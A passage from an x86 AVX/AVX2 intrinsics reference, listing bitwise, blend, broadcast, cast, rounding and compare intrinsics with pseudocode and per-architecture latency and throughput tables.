FOR j := 0 to 1 i := j*128 tmp[255:0] := ((a[i+127:i] << 128) OR b[i+127:i]) >> (count[7:0]*8) dst[i+127:i] := tmp[127:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vandpd
__m256d _mm256_and_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_and_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vandpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of packed double-precision (64-bit) floating-point elements in a and b, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := (a[i+63:i] AND b[i+63:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vandps
__m256 _mm256_and_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_and_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vandps ymm, ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise AND of packed single-precision (32-bit) floating-point elements in a and b, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := (a[i+31:i] AND b[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vpand
__m256i _mm256_and_si256 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_and_si256 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpand ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compute the bitwise AND of 256 bits (representing integer data) in a and b, and store the result in dst.

Operation

dst[255:0] := (a[255:0] AND b[255:0]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vandnpd
__m256d _mm256_andnot_pd (__m256d a, __m256d b)

Synopsis

__m256d _mm256_andnot_pd (__m256d a, __m256d b)
#include «immintrin.h»
Instruction: vandnpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise NOT of packed double-precision (64-bit) floating-point elements in a and then AND with b, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := ((NOT a[i+63:i]) AND b[i+63:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vandnps
__m256 _mm256_andnot_ps (__m256 a, __m256 b)

Synopsis

__m256 _mm256_andnot_ps (__m256 a, __m256 b)
#include «immintrin.h»
Instruction: vandnps ymm, ymm, ymm
CPUID Flags: AVX

Description

Compute the bitwise NOT of packed single-precision (32-bit) floating-point elements in a and then AND with b, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := ((NOT a[i+31:i]) AND b[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vpandn
__m256i _mm256_andnot_si256 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_andnot_si256 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpandn ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compute the bitwise NOT of 256 bits (representing integer data) in a and then AND with b, and store the result in dst.

Operation

dst[255:0] := ((NOT a[255:0]) AND b[255:0]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpavgw
__m256i _mm256_avg_epu16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_avg_epu16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpavgw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Average packed unsigned 16-bit integers in a and b, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := (a[i+15:i] + b[i+15:i] + 1) >> 1 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpavgb
__m256i _mm256_avg_epu8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_avg_epu8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpavgb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Average packed unsigned 8-bit integers in a and b, and store the results in dst.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := (a[i+7:i] + b[i+7:i] + 1) >> 1 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpblendw
__m256i _mm256_blend_epi16 (__m256i a, __m256i b, const int imm8)

Synopsis

__m256i _mm256_blend_epi16 (__m256i a, __m256i b, const int imm8)
#include «immintrin.h»
Instruction: vpblendw ymm, ymm, ymm, imm
CPUID Flags: AVX2

Description

Blend packed 16-bit integers from a and b using control mask imm8, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 IF imm8[j%8] dst[i+15:i] := b[i+15:i] ELSE dst[i+15:i] := a[i+15:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpblendd
__m128i _mm_blend_epi32 (__m128i a, __m128i b, const int imm8)

Synopsis

__m128i _mm_blend_epi32 (__m128i a, __m128i b, const int imm8)
#include «immintrin.h»
Instruction: vpblendd xmm, xmm, xmm, imm
CPUID Flags: AVX2

Description

Blend packed 32-bit integers from a and b using control mask imm8, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*32 IF imm8[j%8] dst[i+31:i] := b[i+31:i] ELSE dst[i+31:i] := a[i+31:i] FI ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.33
vpblendd
__m256i _mm256_blend_epi32 (__m256i a, __m256i b, const int imm8)

Synopsis

__m256i _mm256_blend_epi32 (__m256i a, __m256i b, const int imm8)
#include «immintrin.h»
Instruction: vpblendd ymm, ymm, ymm, imm
CPUID Flags: AVX2

Description

Blend packed 32-bit integers from a and b using control mask imm8, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 IF imm8[j%8] dst[i+31:i] := b[i+31:i] ELSE dst[i+31:i] := a[i+31:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.33
vblendpd
__m256d _mm256_blend_pd (__m256d a, __m256d b, const int imm8)

Synopsis

__m256d _mm256_blend_pd (__m256d a, __m256d b, const int imm8)
#include «immintrin.h»
Instruction: vblendpd ymm, ymm, ymm, imm
CPUID Flags: AVX

Description

Blend packed double-precision (64-bit) floating-point elements from a and b using control mask imm8, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 IF imm8[j%8] dst[i+63:i] := b[i+63:i] ELSE dst[i+63:i] := a[i+63:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.33
Ivy Bridge 1 0.5
Sandy Bridge 1 0.5
vblendps
__m256 _mm256_blend_ps (__m256 a, __m256 b, const int imm8)

Synopsis

__m256 _mm256_blend_ps (__m256 a, __m256 b, const int imm8)
#include «immintrin.h»
Instruction: vblendps ymm, ymm, ymm, imm
CPUID Flags: AVX

Description

Blend packed single-precision (32-bit) floating-point elements from a and b using control mask imm8, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 IF imm8[j%8] dst[i+31:i] := b[i+31:i] ELSE dst[i+31:i] := a[i+31:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.33
Ivy Bridge 1 0.5
Sandy Bridge 1 0.5
vpblendvb
__m256i _mm256_blendv_epi8 (__m256i a, __m256i b, __m256i mask)

Synopsis

__m256i _mm256_blendv_epi8 (__m256i a, __m256i b, __m256i mask)
#include «immintrin.h»
Instruction: vpblendvb ymm, ymm, ymm, ymm
CPUID Flags: AVX2

Description

Blend packed 8-bit integers from a and b using mask, and store the results in dst.

Operation

FOR j := 0 to 31 i := j*8 IF mask[i+7] dst[i+7:i] := b[i+7:i] ELSE dst[i+7:i] := a[i+7:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2 2
vblendvpd
__m256d _mm256_blendv_pd (__m256d a, __m256d b, __m256d mask)

Synopsis

__m256d _mm256_blendv_pd (__m256d a, __m256d b, __m256d mask)
#include «immintrin.h»
Instruction: vblendvpd ymm, ymm, ymm, ymm
CPUID Flags: AVX

Description

Blend packed double-precision (64-bit) floating-point elements from a and b using mask, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 IF mask[i+63] dst[i+63:i] := b[i+63:i] ELSE dst[i+63:i] := a[i+63:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2 2
Ivy Bridge 2 1
Sandy Bridge 2 1
vblendvps
__m256 _mm256_blendv_ps (__m256 a, __m256 b, __m256 mask)

Synopsis

__m256 _mm256_blendv_ps (__m256 a, __m256 b, __m256 mask)
#include «immintrin.h»
Instruction: vblendvps ymm, ymm, ymm, ymm
CPUID Flags: AVX

Description

Blend packed single-precision (32-bit) floating-point elements from a and b using mask, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 IF mask[i+31] dst[i+31:i] := b[i+31:i] ELSE dst[i+31:i] := a[i+31:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 2 2
Ivy Bridge 2 1
Sandy Bridge 2 1
vbroadcastf128
__m256d _mm256_broadcast_pd (__m128d const * mem_addr)

Synopsis

__m256d _mm256_broadcast_pd (__m128d const * mem_addr)
#include «immintrin.h»
Instruction: vbroadcastf128 ymm, m128
CPUID Flags: AVX

Description

Broadcast 128 bits from memory (composed of 2 packed double-precision (64-bit) floating-point elements) to all elements of dst.

Operation

tmp[127:0] = MEM[mem_addr+127:mem_addr] dst[127:0] := tmp[127:0] dst[255:128] := tmp[127:0] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Ivy Bridge 1
Sandy Bridge 1
vbroadcastf128
__m256 _mm256_broadcast_ps (__m128 const * mem_addr)

Synopsis

__m256 _mm256_broadcast_ps (__m128 const * mem_addr)
#include «immintrin.h»
Instruction: vbroadcastf128 ymm, m128
CPUID Flags: AVX

Description

Broadcast 128 bits from memory (composed of 4 packed single-precision (32-bit) floating-point elements) to all elements of dst.

Operation

tmp[127:0] = MEM[mem_addr+127:mem_addr] dst[127:0] := tmp[127:0] dst[255:128] := tmp[127:0] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Ivy Bridge 1
Sandy Bridge 1
vbroadcastsd
__m256d _mm256_broadcast_sd (double const * mem_addr)

Synopsis

__m256d _mm256_broadcast_sd (double const * mem_addr)
#include «immintrin.h»
Instruction: vbroadcastsd ymm, m64
CPUID Flags: AVX

Description

Broadcast a double-precision (64-bit) floating-point element from memory to all elements of dst.

Operation

tmp[63:0] = MEM[mem_addr+63:mem_addr] FOR j := 0 to 3 i := j*64 dst[i+63:i] := tmp[63:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Ivy Bridge 1
Sandy Bridge 1
vbroadcastss
__m128 _mm_broadcast_ss (float const * mem_addr)

Synopsis

__m128 _mm_broadcast_ss (float const * mem_addr)
#include «immintrin.h»
Instruction: vbroadcastss xmm, m32
CPUID Flags: AVX

Description

Broadcast a single-precision (32-bit) floating-point element from memory to all elements of dst.

Operation

tmp[31:0] = MEM[mem_addr+31:mem_addr] FOR j := 0 to 3 i := j*32 dst[i+31:i] := tmp[31:0] ENDFOR dst[MAX:128] := 0
vbroadcastss
__m256 _mm256_broadcast_ss (float const * mem_addr)

Synopsis

__m256 _mm256_broadcast_ss (float const * mem_addr)
#include «immintrin.h»
Instruction: vbroadcastss ymm, m32
CPUID Flags: AVX

Description

Broadcast a single-precision (32-bit) floating-point element from memory to all elements of dst.

Operation

tmp[31:0] = MEM[mem_addr+31:mem_addr] FOR j := 0 to 7 i := j*32 dst[i+31:i] := tmp[31:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Ivy Bridge 1
Sandy Bridge 1
vpbroadcastb
__m128i _mm_broadcastb_epi8 (__m128i a)

Synopsis

__m128i _mm_broadcastb_epi8 (__m128i a)
#include «immintrin.h»
Instruction: vpbroadcastb xmm, xmm
CPUID Flags: AVX2

Description

Broadcast the low packed 8-bit integer from a to all elements of dst.

Operation

FOR j := 0 to 15 i := j*8 dst[i+7:i] := a[7:0] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpbroadcastb
__m256i _mm256_broadcastb_epi8 (__m128i a)

Synopsis

__m256i _mm256_broadcastb_epi8 (__m128i a)
#include «immintrin.h»
Instruction: vpbroadcastb ymm, xmm
CPUID Flags: AVX2

Description

Broadcast the low packed 8-bit integer from a to all elements of dst.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := a[7:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpbroadcastd
__m128i _mm_broadcastd_epi32 (__m128i a)

Synopsis

__m128i _mm_broadcastd_epi32 (__m128i a)
#include «immintrin.h»
Instruction: vpbroadcastd xmm, xmm
CPUID Flags: AVX2

Description

Broadcast the low packed 32-bit integer from a to all elements of dst.

Operation

FOR j := 0 to 3 i := j*32 dst[i+31:i] := a[31:0] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpbroadcastd
__m256i _mm256_broadcastd_epi32 (__m128i a)

Synopsis

__m256i _mm256_broadcastd_epi32 (__m128i a)
#include «immintrin.h»
Instruction: vpbroadcastd ymm, xmm
CPUID Flags: AVX2

Description

Broadcast the low packed 32-bit integer from a to all elements of dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[31:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpbroadcastq
__m128i _mm_broadcastq_epi64 (__m128i a)

Synopsis

__m128i _mm_broadcastq_epi64 (__m128i a)
#include «immintrin.h»
Instruction: vpbroadcastq xmm, xmm
CPUID Flags: AVX2

Description

Broadcast the low packed 64-bit integer from a to all elements of dst.

Operation

FOR j := 0 to 1 i := j*64 dst[i+63:i] := a[63:0] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpbroadcastq
__m256i _mm256_broadcastq_epi64 (__m128i a)

Synopsis

__m256i _mm256_broadcastq_epi64 (__m128i a)
#include «immintrin.h»
Instruction: vpbroadcastq ymm, xmm
CPUID Flags: AVX2

Description

Broadcast the low packed 64-bit integer from a to all elements of dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[63:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
movddup
__m128d _mm_broadcastsd_pd (__m128d a)

Synopsis

__m128d _mm_broadcastsd_pd (__m128d a)
#include «immintrin.h»
Instruction: movddup xmm, xmm
CPUID Flags: AVX2

Description

Broadcast the low double-precision (64-bit) floating-point element from a to all elements of dst.

Operation

FOR j := 0 to 1 i := j*64 dst[i+63:i] := a[63:0] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
Ivy Bridge 1
Sandy Bridge 1
Westmere 1
Nehalem 1
vbroadcastsd
__m256d _mm256_broadcastsd_pd (__m128d a)

Synopsis

__m256d _mm256_broadcastsd_pd (__m128d a)
#include «immintrin.h»
Instruction: vbroadcastsd ymm, xmm
CPUID Flags: AVX2

Description

Broadcast the low double-precision (64-bit) floating-point element from a to all elements of dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[63:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vbroadcasti128
__m256i _mm256_broadcastsi128_si256 (__m128i a)

Synopsis

__m256i _mm256_broadcastsi128_si256 (__m128i a)
#include «immintrin.h»
Instruction: vbroadcasti128 ymm, m128
CPUID Flags: AVX2

Description

Broadcast 128 bits of integer data from a to all 128-bit lanes in dst.

Operation

dst[127:0] := a[127:0] dst[255:128] := a[127:0] dst[MAX:256] := 0
vbroadcastss
__m128 _mm_broadcastss_ps (__m128 a)

Synopsis

__m128 _mm_broadcastss_ps (__m128 a)
#include «immintrin.h»
Instruction: vbroadcastss xmm, xmm
CPUID Flags: AVX2

Description

Broadcast the low single-precision (32-bit) floating-point element from a to all elements of dst.

Operation

FOR j := 0 to 3 i := j*32 dst[i+31:i] := a[31:0] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 3
vbroadcastss
__m256 _mm256_broadcastss_ps (__m128 a)

Synopsis

__m256 _mm256_broadcastss_ps (__m128 a)
#include «immintrin.h»
Instruction: vbroadcastss ymm, xmm
CPUID Flags: AVX2

Description

Broadcast the low single-precision (32-bit) floating-point element from a to all elements of dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[31:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpbroadcastw
__m128i _mm_broadcastw_epi16 (__m128i a)

Synopsis

__m128i _mm_broadcastw_epi16 (__m128i a)
#include «immintrin.h»
Instruction: vpbroadcastw xmm, xmm
CPUID Flags: AVX2

Description

Broadcast the low packed 16-bit integer from a to all elements of dst.

Operation

FOR j := 0 to 7 i := j*16 dst[i+15:i] := a[15:0] ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpbroadcastw
__m256i _mm256_broadcastw_epi16 (__m128i a)

Synopsis

__m256i _mm256_broadcastw_epi16 (__m128i a)
#include «immintrin.h»
Instruction: vpbroadcastw ymm, xmm
CPUID Flags: AVX2

Description

Broadcast the low packed 16-bit integer from a to all elements of dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := a[15:0] ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpslldq
__m256i _mm256_bslli_epi128 (__m256i a, const int imm8)

Synopsis

__m256i _mm256_bslli_epi128 (__m256i a, const int imm8)
#include «immintrin.h»
Instruction: vpslldq ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift 128-bit lanes in a left by imm8 bytes while shifting in zeros, and store the results in dst.

Operation

tmp := imm8[7:0] IF tmp > 15 tmp := 16 FI dst[127:0] := a[127:0] << (tmp*8) dst[255:128] := a[255:128] << (tmp*8) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpsrldq
__m256i _mm256_bsrli_epi128 (__m256i a, const int imm8)

Synopsis

__m256i _mm256_bsrli_epi128 (__m256i a, const int imm8)
#include «immintrin.h»
Instruction: vpsrldq ymm, ymm, imm
CPUID Flags: AVX2

Description

Shift 128-bit lanes in a right by imm8 bytes while shifting in zeros, and store the results in dst.

Operation

tmp := imm8[7:0] IF tmp > 15 tmp := 16 FI dst[127:0] := a[127:0] >> (tmp*8) dst[255:128] := a[255:128] >> (tmp*8) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
__m256 _mm256_castpd_ps (__m256d a)

Synopsis

__m256 _mm256_castpd_ps (__m256d a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Cast vector of type __m256d to type __m256. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m256i _mm256_castpd_si256 (__m256d a)

Synopsis

__m256i _mm256_castpd_si256 (__m256d a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Casts vector of type __m256d to type __m256i. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m256d _mm256_castpd128_pd256 (__m128d a)

Synopsis

__m256d _mm256_castpd128_pd256 (__m128d a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Casts vector of type __m128d to type __m256d; the upper 128 bits of the result are undefined. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m128d _mm256_castpd256_pd128 (__m256d a)

Synopsis

__m128d _mm256_castpd256_pd128 (__m256d a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Casts vector of type __m256d to type __m128d. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m256d _mm256_castps_pd (__m256 a)

Synopsis

__m256d _mm256_castps_pd (__m256 a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Cast vector of type __m256 to type __m256d. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m256i _mm256_castps_si256 (__m256 a)

Synopsis

__m256i _mm256_castps_si256 (__m256 a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Casts vector of type __m256 to type __m256i. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m256 _mm256_castps128_ps256 (__m128 a)

Synopsis

__m256 _mm256_castps128_ps256 (__m128 a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Casts vector of type __m128 to type __m256; the upper 128 bits of the result are undefined. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m128 _mm256_castps256_ps128 (__m256 a)

Synopsis

__m128 _mm256_castps256_ps128 (__m256 a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Casts vector of type __m256 to type __m128. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m256i _mm256_castsi128_si256 (__m128i a)

Synopsis

__m256i _mm256_castsi128_si256 (__m128i a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Casts vector of type __m128i to type __m256i; the upper 128 bits of the result are undefined. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m256d _mm256_castsi256_pd (__m256i a)

Synopsis

__m256d _mm256_castsi256_pd (__m256i a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Casts vector of type __m256i to type __m256d. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m256 _mm256_castsi256_ps (__m256i a)

Synopsis

__m256 _mm256_castsi256_ps (__m256i a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Casts vector of type __m256i to type __m256. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m128i _mm256_castsi256_si128 (__m256i a)

Synopsis

__m128i _mm256_castsi256_si128 (__m256i a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Casts vector of type __m256i to type __m128i. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
vroundpd
__m256d _mm256_ceil_pd (__m256d a)

Synopsis

__m256d _mm256_ceil_pd (__m256d a)
#include «immintrin.h»
Instruction: vroundpd ymm, ymm, imm
CPUID Flags: AVX

Description

Round the packed double-precision (64-bit) floating-point elements in a up to an integer value, and store the results as packed double-precision floating-point elements in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := CEIL(a[i+63:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vroundps
__m256 _mm256_ceil_ps (__m256 a)

Synopsis

__m256 _mm256_ceil_ps (__m256 a)
#include «immintrin.h»
Instruction: vroundps ymm, ymm, imm
CPUID Flags: AVX

Description

Round the packed single-precision (32-bit) floating-point elements in a up to an integer value, and store the results as packed single-precision floating-point elements in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := CEIL(a[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vcmppd
__m128d _mm_cmp_pd (__m128d a, __m128d b, const int imm8)

Synopsis

__m128d _mm_cmp_pd (__m128d a, __m128d b, const int imm8)
#include «immintrin.h»
Instruction: vcmppd xmm, xmm, xmm, imm
CPUID Flags: AVX

Description

Compare packed double-precision (64-bit) floating-point elements in a and b based on the comparison operand specified by imm8, and store the results in dst.

Operation

CASE (imm8[7:0]) OF 0: OP := _CMP_EQ_OQ 1: OP := _CMP_LT_OS 2: OP := _CMP_LE_OS 3: OP := _CMP_UNORD_Q 4: OP := _CMP_NEQ_UQ 5: OP := _CMP_NLT_US 6: OP := _CMP_NLE_US 7: OP := _CMP_ORD_Q 8: OP := _CMP_EQ_UQ 9: OP := _CMP_NGE_US 10: OP := _CMP_NGT_US 11: OP := _CMP_FALSE_OQ 12: OP := _CMP_NEQ_OQ 13: OP := _CMP_GE_OS 14: OP := _CMP_GT_OS 15: OP := _CMP_TRUE_UQ 16: OP := _CMP_EQ_OS 17: OP := _CMP_LT_OQ 18: OP := _CMP_LE_OQ 19: OP := _CMP_UNORD_S 20: OP := _CMP_NEQ_US 21: OP := _CMP_NLT_UQ 22: OP := _CMP_NLE_UQ 23: OP := _CMP_ORD_S 24: OP := _CMP_EQ_US 25: OP := _CMP_NGE_UQ 26: OP := _CMP_NGT_UQ 27: OP := _CMP_FALSE_OS 28: OP := _CMP_NEQ_OS 29: OP := _CMP_GE_OQ 30: OP := _CMP_GT_OQ 31: OP := _CMP_TRUE_US ESAC FOR j := 0 to 1 i := j*64 dst[i+63:i] := ( a[i+63:i] OP b[i+63:i] ) ? 0xFFFFFFFFFFFFFFFF : 0 ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 3
Sandy Bridge 3
vcmppd
__m256d _mm256_cmp_pd (__m256d a, __m256d b, const int imm8)

Synopsis

__m256d _mm256_cmp_pd (__m256d a, __m256d b, const int imm8)
#include «immintrin.h»
Instruction: vcmppd ymm, ymm, ymm, imm
CPUID Flags: AVX

Description

Compare packed double-precision (64-bit) floating-point elements in a and b based on the comparison operand specified by imm8, and store the results in dst.

Operation

CASE (imm8[7:0]) OF 0: OP := _CMP_EQ_OQ 1: OP := _CMP_LT_OS 2: OP := _CMP_LE_OS 3: OP := _CMP_UNORD_Q 4: OP := _CMP_NEQ_UQ 5: OP := _CMP_NLT_US 6: OP := _CMP_NLE_US 7: OP := _CMP_ORD_Q 8: OP := _CMP_EQ_UQ 9: OP := _CMP_NGE_US 10: OP := _CMP_NGT_US 11: OP := _CMP_FALSE_OQ 12: OP := _CMP_NEQ_OQ 13: OP := _CMP_GE_OS 14: OP := _CMP_GT_OS 15: OP := _CMP_TRUE_UQ 16: OP := _CMP_EQ_OS 17: OP := _CMP_LT_OQ 18: OP := _CMP_LE_OQ 19: OP := _CMP_UNORD_S 20: OP := _CMP_NEQ_US 21: OP := _CMP_NLT_UQ 22: OP := _CMP_NLE_UQ 23: OP := _CMP_ORD_S 24: OP := _CMP_EQ_US 25: OP := _CMP_NGE_UQ 26: OP := _CMP_NGT_UQ 27: OP := _CMP_FALSE_OS 28: OP := _CMP_NEQ_OS 29: OP := _CMP_GE_OQ 30: OP := _CMP_GT_OQ 31: OP := _CMP_TRUE_US ESAC FOR j := 0 to 3 i := j*64 dst[i+63:i] := ( a[i+63:i] OP b[i+63:i] ) ? 0xFFFFFFFFFFFFFFFF : 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vcmpps
__m128 _mm_cmp_ps (__m128 a, __m128 b, const int imm8)

Synopsis

__m128 _mm_cmp_ps (__m128 a, __m128 b, const int imm8)
#include «immintrin.h»
Instruction: vcmpps xmm, xmm, xmm, imm
CPUID Flags: AVX

Description

Compare packed single-precision (32-bit) floating-point elements in a and b based on the comparison operand specified by imm8, and store the results in dst.

Operation

CASE (imm8[7:0]) OF 0: OP := _CMP_EQ_OQ 1: OP := _CMP_LT_OS 2: OP := _CMP_LE_OS 3: OP := _CMP_UNORD_Q 4: OP := _CMP_NEQ_UQ 5: OP := _CMP_NLT_US 6: OP := _CMP_NLE_US 7: OP := _CMP_ORD_Q 8: OP := _CMP_EQ_UQ 9: OP := _CMP_NGE_US 10: OP := _CMP_NGT_US 11: OP := _CMP_FALSE_OQ 12: OP := _CMP_NEQ_OQ 13: OP := _CMP_GE_OS 14: OP := _CMP_GT_OS 15: OP := _CMP_TRUE_UQ 16: OP := _CMP_EQ_OS 17: OP := _CMP_LT_OQ 18: OP := _CMP_LE_OQ 19: OP := _CMP_UNORD_S 20: OP := _CMP_NEQ_US 21: OP := _CMP_NLT_UQ 22: OP := _CMP_NLE_UQ 23: OP := _CMP_ORD_S 24: OP := _CMP_EQ_US 25: OP := _CMP_NGE_UQ 26: OP := _CMP_NGT_UQ 27: OP := _CMP_FALSE_OS 28: OP := _CMP_NEQ_OS 29: OP := _CMP_GE_OQ 30: OP := _CMP_GT_OQ 31: OP := _CMP_TRUE_US ESAC FOR j := 0 to 3 i := j*32 dst[i+31:i] := ( a[i+31:i] OP b[i+31:i] ) ? 0xFFFFFFFF : 0 ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 3
Sandy Bridge 3
vcmpps
__m256 _mm256_cmp_ps (__m256 a, __m256 b, const int imm8)

Synopsis

__m256 _mm256_cmp_ps (__m256 a, __m256 b, const int imm8)
#include «immintrin.h»
Instruction: vcmpps ymm, ymm, ymm, imm
CPUID Flags: AVX

Description

Compare packed single-precision (32-bit) floating-point elements in a and b based on the comparison operand specified by imm8, and store the results in dst.

Operation

